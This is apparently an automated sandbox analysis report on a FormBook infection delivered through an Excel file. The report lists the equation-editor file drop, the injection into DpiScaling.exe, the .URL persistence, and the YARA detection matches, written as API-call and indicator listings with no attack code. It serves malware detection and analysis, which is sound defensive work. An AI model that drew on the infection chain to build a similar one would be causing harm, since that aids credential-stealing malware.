Code function: 9_2_0042CA18 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

9_2_0042CA18

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_00448008 GetKeyboardState,

9_2_00448008

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0043F6B0 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,

9_2_0043F6B0

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\Public\Libraries\hpvdsxZ.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249BABE	7_2_7249BABE
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72481030	7_2_72481030
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249C130	7_2_7249C130
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249C9A5	7_2_7249C9A5
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72482FB0	7_2_72482FB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72488C7B	7_2_72488C7B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249C4E6	7_2_7249C4E6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72488C80	7_2_72488C80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72482D87	7_2_72482D87
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72482D90	7_2_72482D90
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02641238	7_2_02641238
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259E2E9	7_2_0259E2E9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A7353	7_2_025A7353
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025EA37B	7_2_025EA37B
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A2305	7_2_025A2305
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025C63DB	7_2_025C63DB
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259F3CF	7_2_0259F3CF
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025B905A	7_2_025B905A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A3040	7_2_025A3040
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025CD005	7_2_025CD005
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259E0C6	7_2_0259E0C6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02642622	7_2_02642622
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025AE6C1	7_2_025AE6C1
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A4680	7_2_025A4680
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025D57C3	7_2_025D57C3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025AC7BC	7_2_025AC7BC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0262579A	7_2_0262579A
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025DD47D	7_2_025DD47D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025B1489	7_2_025B1489
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025D5485	7_2_025D5485
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025E6540	7_2_025E6540
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A351F	7_2_025A351F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025BC5F0	7_2_025BC5F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02653A83	7_2_02653A83
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025C7B00	7_2_025C7B00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259FBD7	7_2_0259FBD7
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0262DBDA	7_2_0262DBDA
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0264CBA4	7_2_0264CBA4
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025AC85C	7_2_025AC85C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025C286D	7_2_025C286D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0263F8EE	7_2_0263F8EE
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02625955	7_2_02625955
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025B69FE	7_2_025B69FE
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025A29B2	7_2_025A29B2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0264098E	7_2_0264098E
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025BEE4C	7_2_025BEE4C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025D2E2F	7_2_025D2E2F
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025CDF7C	7_2_025CDF7C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025B0F3F	7_2_025B0F3F
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00460A1C	9_2_00460A1C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0043D6C0	9_2_0043D6C0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0049F758	9_2_0049F758
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0045B7EC	9_2_0045B7EC

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0260F970 appears 75 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0259DF5C appears 108 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0259E2A8 appears 33 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 025E3F92 appears 87 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 025E373B appears 213 times
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: String function: 004043D8 appears 71 times
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: String function: 00406B94 appears 61 times

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72498690 NtReadFile,	7_2_72498690
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72498710 NtClose,	7_2_72498710
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_724987C0 NtAllocateVirtualMemory,	7_2_724987C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_724985E0 NtCreateFile,	7_2_724985E0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_724987C2 NtAllocateVirtualMemory,	7_2_724987C2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,	7_2_02590048
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025900C4 NtCreateFile,LdrInitializeThunk,	7_2_025900C4
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025907AC NtCreateMutant,LdrInitializeThunk,	7_2_025907AC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_0258FAD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_0258FAE8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_0258FB68
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_0258FBB8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258F9F0 NtClose,LdrInitializeThunk,	7_2_0258F9F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_0258FED0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FFB4 NtCreateSection,LdrInitializeThunk,	7_2_0258FFB4
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_0258FC60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_0258FDC0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02590078 NtResumeThread,	7_2_02590078
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02590060 NtQuerySection,	7_2_02590060
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025910D0 NtOpenProcessToken,	7_2_025910D0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02591148 NtOpenThread,	7_2_02591148
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259010C NtOpenDirectoryObject,	7_2_0259010C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_025901D4 NtSetValueKey,	7_2_025901D4
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FA50 NtEnumerateValueKey,	7_2_0258FA50
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FA20 NtQueryInformationFile,	7_2_0258FA20
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FAB8 NtQueryValueKey,	7_2_0258FAB8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FB50 NtCreateKey,	7_2_0258FB50
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FBE8 NtQueryVirtualMemory,	7_2_0258FBE8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258F8CC NtWaitForSingleObject,	7_2_0258F8CC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258F900 NtReadFile,	7_2_0258F900
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258F938 NtWriteFile,	7_2_0258F938
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02591930 NtSetContextThread,	7_2_02591930
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FE24 NtWriteVirtualMemory,	7_2_0258FE24
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FEA0 NtReadVirtualMemory,	7_2_0258FEA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FF34 NtQueueApcThread,	7_2_0258FF34
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FFFC NtCreateProcessEx,	7_2_0258FFFC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FC48 NtSetInformationFile,	7_2_0258FC48
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_02590C40 NtGetContextThread,	7_2_02590C40
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FC30 NtOpenProcess,	7_2_0258FC30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0258FC90 NtUnmapViewOfSection,	7_2_0258FC90
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466610 NtdllDefWindowProc_A,	9_2_00466610
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0044AFA4 NtdllDefWindowProc_A,GetCapture,	9_2_0044AFA4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_00466DB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_00466E64
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0045B7EC GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	9_2_0045B7EC
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0043D9D0 NtdllDefWindowProc_A,	9_2_0043D9D0

Source: vbc.exe.2.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: Zxsdvph.exe.4.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS

Source: vbc.exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Zxsdvph.exe.4.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Section loaded: msmpcom.dll			Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Section loaded: msmpcom.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 72480000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 72480000 page no access	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 72480000 page read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 72481000 page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Swift.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@8/21@6/1

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_004709EC CoCreateInstance,

9_2_004709EC

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0049FF2C EntryPoint,GetDiskFreeSpaceExA,

9_2_0049FF2C

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0042982C GetLastError,FormatMessageA,

9_2_0042982C

Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0041C244 FindResourceA,

9_2_0041C244

Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: DpiScaling.exe

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249A3BA pushfd ; ret	7_2_7249A3BB
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249B83B push eax; ret	7_2_7249B8A2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249B832 push eax; ret	7_2_7249B838
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249B89C push eax; ret	7_2_7249B8A2
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72486907 push 00000060h; retf	7_2_7248691C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249A11B push ecx; ret	7_2_7249A11C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_72499E43 push 0000007Eh; iretd	7_2_72499E45
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7248EFC6 push cs; ret	7_2_7248EFCC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_7249B7E5 push eax; ret	7_2_7249B838
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_724954EE pushad ; retf	7_2_724954F0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 7_2_0259DFA1 push ecx; ret	7_2_0259DFB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00452658 push 004526E5h; ret	9_2_004526DD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0046A054 push ecx; mov dword ptr [esp], ecx	9_2_0046A059
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00434010 push 0043405Ch; ret	9_2_00434054
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_004540CC push 004540F8h; ret	9_2_004540F0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0047208C push 004720B8h; ret	9_2_004720B0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0041A0AC push eax; iretd	9_2_0041A0AD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0041A19C push eax; iretd	9_2_0041A19D
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00426248 push 004262F3h; ret	9_2_004262EB
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0041A250 push eax; iretd	9_2_0041A251
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0047223C push ecx; mov dword ptr [esp], edx	9_2_00472241
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0048C2F0 push 0048C31Ch; ret	9_2_0048C314
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_004262F8 push 00426388h; ret	9_2_00426380
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0045C2A4 push 0045C30Fh; ret	9_2_0045C307
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_004402A0 push 004402F9h; ret	9_2_004402F1
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0041A34C push eax; iretd	9_2_0041A3DD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0044033C push 00440374h; ret	9_2_0044036C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_004403D0 push 004403FCh; ret	9_2_004403F4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0043C3EC push 0043C418h; ret	9_2_0043C410
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00416450 push ecx; mov dword ptr [esp], eax	9_2_00416453
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_0043C45C push 0043C488h; ret	9_2_0043C480

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

9_2_0045200C

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

